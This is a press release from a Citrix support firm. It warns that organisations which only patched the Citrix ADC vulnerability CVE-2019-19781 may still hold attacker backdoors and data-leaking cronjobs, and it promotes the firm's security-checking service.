Organisations urged to review systems after a raft of cyber-attacks

ORGANISATIONS that did not follow the recommended mitigation strategy of Citrix vulnerability CVE-2019-19781 need to urgently review security on their Citrix ADCs.

The warning comes after an influx of companies which have been attacked using this exploit without detection.

While Citrix first notified everyone of this vulnerability back in December 2019, there are still major organisations – in both the public and private sectors – which have been impacted by this and are at risk, due to this vulnerability.

Dan Challinor, Axess Systems’ in-house Cyber Security Specialist, said: “When Citrix released the security notice, it contained mitigation steps consisting of rewrite action and responder policy, which they advised should be applied as soon as possible to eliminate any threat.”

However, not all organisations followed these prescribed steps and that, according to Dan, means attackers had an opportunity to exploit and gain access to data and systems.

He said: “Citrix advised that any ADC that didn’t have the mitigation policy applied to them before January 9th, 2020, it should be considered as being breached due to this vulnerability.

“What I have seen is that rather than following this and rebuilding the ADC environment, only the mitigation as advised by Citrix was applied.

“This has resulted in organisations not realising that their Citrix ADC appliances have been compromised and backdoors created on the Gateways to allow access to attackers even though the original vulnerability had been mitigated.

“These ‘backdoors’ allow attackers to maintain a persistent connection into the Citrix ADC appliances. From here, they could enumerate the IT infrastructure, looking for other systems with vulnerabilities or other avenues of attack such as accounts with weak passwords to escalate their privileges within the company’s IT Infrastructure. 

“Another form of data loss observed on compromised ADC appliances were scheduled tasks (cronjobs) created on them which would send the configuration files and SSL Certificates and their Keys to web servers in foreign countries. These configuration files can be used to obtain passwords that can easily be cracked that are used for LDAP and RAIDUS authentications, and captured data could be decrypted using the SSL Certificate Keys. 

“We have also found that companies that have been compromised in this way and have applied the mitigation, when they have been scanned for vulnerabilities and been Penetration Tested that these backdoors have not been discovered, and we have also found that businesses have not noticed the data being leaked from the Citrix ADC appliances.”

We are proud to be a Citrix Gold Solution Advisor, working with large-scale public sector organisations – including NHS Trusts, finance companies and emergency services – and medium-sized SMEs-to improve security, workspaces, prevent data loss, and implement hybrid cloud and networks.

Heath Roberts, Axess Systems’ Operations Director, added, “We recently took over the Citrix support, monitoring and consultancy of five organisations. In all bar one, when we instigated our Citrix Security Service, we not only found attackers had exploited this vulnerability, it was active.

“And these were not small organisations. They all have in-house security teams and have regular external penetration tests which had not spotted that this exploit was being used.

“Our Citrix Security Service protects our clients with regular scans, monitoring, health checks and reviews built on over 20 years of Citrix experience.

“And I would strongly urge everyone to check their ADCs were mitigated properly in line with the guidance issued by Citrix at the time.”

If you need any assistance with implementing these checks for your organisation, please contact 01773 882602.